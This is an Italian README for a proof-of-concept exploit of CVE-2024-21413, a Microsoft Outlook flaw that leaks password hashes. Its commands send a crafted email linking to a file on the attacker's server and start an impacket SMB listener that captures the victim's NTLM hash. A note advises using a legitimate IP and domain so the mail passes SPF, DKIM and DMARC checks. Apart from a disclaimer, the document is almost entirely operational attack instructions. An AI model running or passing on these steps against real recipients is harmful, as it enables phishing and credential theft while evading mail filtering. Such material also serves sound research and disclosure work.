
Vulnerabilità di divulgazione delle informazioni in Microsoft Outlook (perdita dell'hash della password) - CVE-2024-21413 POC
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
[!NOTE] r00tb1t: è il file di test condiviso (word in questo caso) dalla macchina dell'attaccante (xx.xx.xx.xx).
Per garantire la conformità con SPF, DKIM e DMARC, utilizza un $IP e un dominio legittimi.
Assicurati di installare la libreria pexpect se non l'hai già fatto usando
pip install pexpect.
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
- Kudooooos & dettagli sulla CVE-2024-21413 .
- Workaround/Correzione:
[!CAUTION] ⚠️ Disclaimer: IMPORTANTE: Questo script è fornito SOLO per scopi educativi, test etici e uso legale. Non utilizzarlo su alcun sistema o rete senza autorizzazione esplicita. L'accesso non autorizzato a sistemi informatici e reti è illegale e gli utenti sorpresi a compiere attività non autorizzate sono soggetti ad azioni legali. L'autore NON è responsabile per qualsiasi danno causato dall'uso improprio di questo script..